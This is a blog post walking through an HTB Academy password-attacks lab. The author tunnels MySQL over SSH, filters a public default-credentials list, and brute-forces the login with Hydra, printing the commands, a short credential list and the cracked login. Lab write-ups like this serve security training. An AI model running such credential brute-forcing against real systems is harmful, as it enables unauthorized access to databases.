DEV Community

maz4l
maz4l

Posted on • Edited on

HTB Academy: Password Attacks Module – Password Reuse/Default Passwords

Image description

Challenge Overview:

The task is to find MySQL credentials using previously discovered user credentials. Below is the step-by-step approach I followed to solve this challenge.


Step 1: Establish an SSH Tunnel.Tab A

Using SSH, I forwarded the MySQL port (3306) to my local machine:

ssh -L 4444:localhost:3306 sam@10.129.xx.xxx
Enter fullscreen mode Exit fullscreen mode
  • Username: sam
  • Password: B@t********

Step 2: Download Default Credentials Cheat Sheet. Tab B

I fetched a default credentials cheat sheet that includes common MySQL credentials:

wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv
Enter fullscreen mode Exit fullscreen mode

Step 3: Filter for MySQL Credentials

Using grep, I extracted MySQL-specific credentials from the cheat sheet and saved them to a file for further testing:

cat DefaultCreds-Cheat-Sheet.csv 
grep -i 'mysql' DefaultCreds-Cheat-Sheet.csv > cred.list
Enter fullscreen mode Exit fullscreen mode

I then manually edited the cred.list file to keep the most promising credentials:

admin@example.com:admin
root:<blank>
root:root
superdba:admin
scrutremote:admin
Enter fullscreen mode Exit fullscreen mode

Step 4: Brute-Force Login Using Hydra

To automate the login attempts, I used hydra with the credentials file:

hydra -C cred.list mysql://localhost:4444
Enter fullscreen mode Exit fullscreen mode

Success!

After a few attempts, Hydra successfully found valid MySQL credentials:

  • Login: superdba
  • Password: admin
[4444][mysql] host: localhost login: superdba password: admin
1 of 1 target successfully completed, 1 valid password found
Enter fullscreen mode Exit fullscreen mode

Happy Hacking!

Top comments (0)